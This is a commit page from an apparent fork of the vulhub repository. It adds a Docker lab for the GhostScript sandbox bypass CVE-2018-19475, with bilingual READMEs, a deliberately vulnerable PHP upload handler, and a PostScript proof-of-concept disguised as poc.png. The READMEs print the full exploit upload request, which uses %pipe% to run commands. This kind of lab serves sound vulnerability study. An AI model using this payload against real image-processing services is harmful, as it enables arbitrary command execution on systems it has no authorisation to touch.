aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
ghostscript/CVE-2018-19475/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

54
ghostscript/CVE-2018-19475/README.md Normal file
View File

@@ -0,0 +1,54 @@
# GhostScript Sandbox Bypass Command Execution (CVE-2018-19475)
[中文版本(Chinese version)](README.zh-cn.md)
GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries.
In late 2018, Man Yue Mo from the Semmle Security Research Team published a variant of [CVE-2018-16509](../CVE-2018-16509), designated as CVE-2018-19475. This vulnerability allows attackers to bypass GhostScript's sandbox through a malicious image and execute arbitrary commands in gs versions prior to 9.26.
References:
- <https://blog.semmle.com/ghostscript-CVE-2018-19475/>
- <https://bugs.ghostscript.com/show_bug.cgi?id=700153>
## Environment Setup
Execute the following command to start a vulnerable environment (including GhostScript 9.25 and ImageMagick 7.0.8-20):
```
docker compose up -d
```
After the server is started, visit `http://your-ip:8080` to see an upload component.
## Vulnerability Reproduction
Upload the POC as an image to execute the command `id > /tmp/success && cat /tmp/success`:
```
POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279
------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--
```
As you can see, the command will be successfully executed.
![](1.png)
In real-world scenarios, you may need to use out-of-band techniques to detect the vulnerability as direct output may not be available.

52
ghostscript/CVE-2018-19475/README.zh-cn.md Normal file
View File

@@ -0,0 +1,52 @@
# GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475
GhostScript 是一套基于 Adobe Systems 的 PostScript 和 PDF 页面描述语言解释器的软件。它被许多图像处理库广泛使用。
2018年底来自 Semmle Security Research Team 的 Man Yue Mo 发表了 CVE-2018-16509 漏洞的变体 CVE-2018-19475。该漏洞允许攻击者通过恶意图片绕过 GhostScript 的沙箱,进而在 9.26 以前版本的 gs 中执行任意命令。
参考链接:
- <https://blog.semmle.com/ghostscript-CVE-2018-19475/>
- <https://bugs.ghostscript.com/show_bug.cgi?id=700153>
## 环境搭建
执行如下命令启动漏洞环境(其中包括 GhostScript 9.25 和 ImageMagick 7.0.8-20
```
docker compose up -d
```
环境启动后,访问 `http://your-ip:8080` 将看到一个文件上传组件。
## 漏洞复现
将 POC 作为图片上传,执行命令 `id > /tmp/success && cat /tmp/success`
```
POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279
------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--
```
可见,命令将被成功执行。
![](1.png)
在实际环境中,由于通常无法直接看到命令执行结果,你可能需要使用带外攻击技术来检测漏洞。

8
ghostscript/CVE-2018-19475/docker-compose.yml Normal file
View File

@@ -0,0 +1,8 @@
services:
web:
image: vulhub/imagemagick:7.0.8-20-php
command: php -t /var/www/html -S 0.0.0.0:8080
volumes:
- ./index.php:/var/www/html/index.php
ports:
- "8080:8080"

21
ghostscript/CVE-2018-19475/index.php Normal file
View File

@@ -0,0 +1,21 @@
<?php
if (!empty($_FILES)):
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
die('Unsupported filetype uploaded.');
}
$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
echo "Image size is: $size";
else:
?>
<form method="post" enctype="multipart/form-data">
File: <input type="file" name="file_upload">
<input type="submit">
</form>
<?php
endif;

4
ghostscript/CVE-2018-19475/poc.png Normal file
View File

@@ -0,0 +1,4 @@
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file